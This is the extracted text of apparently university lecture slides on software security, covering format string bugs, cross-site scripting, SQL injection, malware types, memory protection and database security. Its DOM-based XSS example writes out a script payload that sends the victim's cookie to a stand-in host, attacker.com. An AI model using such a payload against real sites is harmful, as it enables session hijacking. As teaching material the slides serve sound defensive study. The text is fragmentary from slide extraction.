Professional Documents
Culture Documents
SECURITY
MODULE 2
SOFTWARE SECURITY
SPR
Buffer Overflow
SPR
Buffer Overflow
SPR
Format string vulnerability
Format String Vulnerability
SPR
Format String Vulnerability : example
Safe Code
The line printf("%s", argv[1]); in the example is safe, if you compile the program and
run it:
./example "Hello World %s%s%s%s%s%s"
The printf in the first line will not interpret the “%s%s%s%s%s%s” in the input string, and
the output will be: “Hello World %s%s%s%s%s%s”
SPR
Format String Vulnerability : example
Vulnerable Code
The line printf(argv[1]); in the example is vulnerable, if you compile the program
and run it:
./example "Hello World %s%s%s%s%s%s"
The printf in the second line will interpret the %s%s%s%s%s%s in the input string
as a reference to string pointers, so it will try to interpret every %s as a pointer to a
string, starting from the location of the buffer (probably on the Stack). At some
point, it will get to an invalid address, and attempting to access it will cause the
program to crash.
SPR
Buffer overflow vs. format string
SPR
Cross site scripting(XXS)
SPR
How does XSS work?
SPR
Reflected XSS
Cross-site scripting (XSS) is a web application vulnerability that permits
an attacker to inject code, (typically HTML or JavaScript), into the contents
of an outside website. When a victim views an infected page on the website,
the injected code executes in the victim’s browser.
SPR
Reflected XSS
SPR
Stored XSS
Stored XSS
SPR
DOM-based XSS
SPR
DOM-based XSS
2. GET
http://website.com/search?keyword=<script>window.location='http://a
ttacker.com/?cookie='+document.cookie</script>
3. The website returns a response without the search string in the HTML
body
<html>
<h1> You Searched for:</h1>
<div id ="searchquery"> </div>
<script>
var keyword = location.search.substring(3);
document.querySelector('searchquery').innerHTML = keyword;
<script>
</html>
SPR
example of DOM-based cross-site scripting
4. The HTML added is the malicious code that steals the user’s cookie
<html>
<h1> You Searched for:</h1>
<div id
="searchquery"><script>window.location='http://attacker.com/?coo
kie='+document.cookie</script> </div>
<script>
var keyword = location.search.substring(3);
document.querySelector('searchquery').innerHTML = keyword;
<script>
</html>
5. The browser executes the new code and sends a get request to the
attacker’s server with the user’s cookie.
GET "http://attacker.com/?cookie=user-cookie"
SQL injection attack (SQLi)
SPR
How does SQLi work?
How does SQLi work?
SPR
Notable SQL Injection Vulnerabilities
Tesla vulnerability
Cisco vulnerability
Fortnite vulnerability
How to prevent against SQL Injection attacks
SPR
Malware
SPR
MALWARE classification
Remote
Traditional Autonomous
Controlled
Trojan Horse
SPR
Virus
Self-replicating code
Alters normal code with “infected” version
SPR
1. Boot Sector Virus – This type of virus infects the master boot
record and it is challenging and a complex task to remove this
virus and often requires the system to be formatted. Mostly it
spreads through removable media.
2. Direct Action Virus – This is also called non-resident virus, it
gets installed or stays hidden in the computer memory. It stays
attached to the specific type of files that it infect. It does not affect
the user experience and system’s performance.
3. Resident Virus – Unlike direct action viruses, resident viruses
get installed on the computer. It is difficult to identify the virus
and it is even difficult to remove a resident virus.
4. Multipartite Virus – This type of virus spreads through
multiple ways. It infects both the boot sector and executable files
Viruses 5.
at the same time.
Polymorphic Virus – These type of viruses are difficult to
identify with a traditional anti-virus program. This is because the
polymorphic viruses alters its signature pattern whenever it
replicates.
6. Overwrite Virus – This type of virus deletes all the files that it
infects. The only possible mechanism to remove is to delete the
infected files and the end-user has to lose all the contents in it.
Identifying the overwrite virus is difficult as it spreads through
emails.
7. Spacefiller Virus – This is also called “Cavity Viruses”. This is
called so as they fill up the empty spaces between the code and
hence does not cause any damage to the file.
Spreads without user
interaction
Worms Spreads over the
network
Self Replicating
SPR
Worm
SPR
More recent worm attacks
Code Red
July 2001 exploiting MS IIS bug
probes random IP address, does DDoS attack
consumes significant net capacity when active
360,000 servers in 14 hours
SPR
Trojan horse
SPR
Backdoor Trojan
Distributed Denial of Service
(DDoS) attack Trojan
Common Downloader Trojan
types of Game-thief Trojan
Mail finder Trojan
Trojan Fake AV Trojan
malware Ransom Trojan
Remote Access Trojan
Rootkit Trojan
SMS Trojan
Trojan banker
Trojan IM
Trojan Horse Malware Examples
How to Detect Trojans in Your Organization
SPR
Logic bombs
User-level rootkits
Kernel-level rootkits
Bootkits
Firmware rootkits
Rootkit hypervisors
Bots
SPR
Fence
0
Hardware
Address
Limitation Operating
System
n
n+1
1. Fixed Address
2. Hardware Register (Fence Register) User
Program
Space
High
SPR
Fence Register
SPR
Fence Register
However, the operating system can change in size from version to version,
and it would be extremely difficult and time consuming to manually update
the address location.
By adding a relocation factor to each address for the program, the system
can automatically update the addresses as needed.
SPR
Relocation
SPR
Base/Bounds Registers
Segmentation
Main
SEG_A
DATA_SEG
Physical
SUB Placement of
Program
Main
DATA_SEG
Logical SUB
Arrangement
of Program
SPR
1. FAT32
File
2. NTFS
Protection
Mechanism
File mechanism
SPR
FAT 32 and NTFS structure
NTFS partition
SPR
File Protection Mechanism
File Protection Mechanism
USER AUTHENTICATION
LINUX vs WINDOWS
SPR
LINUX vs WINDOWS
Database Security
1. Database Security
Requirements
2. Reliability and
Integrity
3. Sensitive Data
Database 4. Inference Attacks
Security
SPR
Database Security
SPR
Database Security
SPR
Database Security Requirements
1. Physical Database
Integrity
2. Logical Database
Integrity
3. Element Integrity
4. Auditability
5. Access Control
6. User Authentication
7. Availability
SPR
Database Security Requirements
Physical Database Integrity:
the data of the database are immune from physical
problems, such as power failures, and someone can
reconstruct the database if it is destroyed through a
catastrophe.
Physically securing storage media
Regular backups
SPR
Database Security Requirements
Element Integrity:
The data contained in each element are accurate.
Field check
Allows only acceptable values.
Access control
Allows only authorized users to update element.
Collection and control of data at one central source.
Change log
Lists every change made to the database(original + modified)
Obtain original eligibility value from log and correct the
database.
Auditability:
it is possible to track who or what has accessed/ modified
elements in the database.
Log read/write in database.
SPR
1. Database Security Requirements
Access Control:
A user is allowed to access only authorized data and
different users can be restricted to different modes of
access.
Logical separation by user access privileges(view , relation,
field, record / at element level)
Modes of access
User Authentication:
Every user is positively identified – both for the audit trail
and for permission to access certain data.
Separate from OS and Rigorous.
Availability:
Users can access the database in general and the data for
which they are authorized.
Right data at Right user at Right time.
SPR
As a Whole
Database Authentication
Specific
relations or
2. Reliability Element
values
Proper
and Access
Control
Integrity
Prevent
insertion of
Accuracy improper
values.
Auditing
SPR
3. Sensitive
Data
SPR
An Inference Attack is a data
mining technique performed by
analysing data in order to
illegitimately gain knowledge about
a subject or database
4. Inference
Attack
SPR
4. Inference Attack: example
SPR
4. Inference Attack: example
SPR
There are 2 ways by dealing with the threat of disclosure by
inference
SPR
Multilevel Database Security
SPR
Polyinstantiation: Types
Entity polyinstantiation:
occur when a relation contains more than one tuple with the
same primary key values, but with different access class values
for the primary key.
Attribute polyinstantiation:
occur when a relation contains two or more tuples with an
identical primary key and its security level values, but with
different values for one or more remaining attributes
Sea View model
In a sea view model, data are stored in a set of single level fragments
and the multilevel relations are implemented as views over these
single-level relations
Sea View model
SPR
Sea View model
Repeated joints
Spurious tuples
Incompleteness
Left outer joins
Jajodia-Sandhu Model
For example, the relation in Table 8 will be decomposed into two single-level
fragments, as shown in Table
9
7
Jajodia-Sandhu Model: limitations
Semantic ambiguity
Operational incompleteness
SPR
Smith- winslett Model
SPR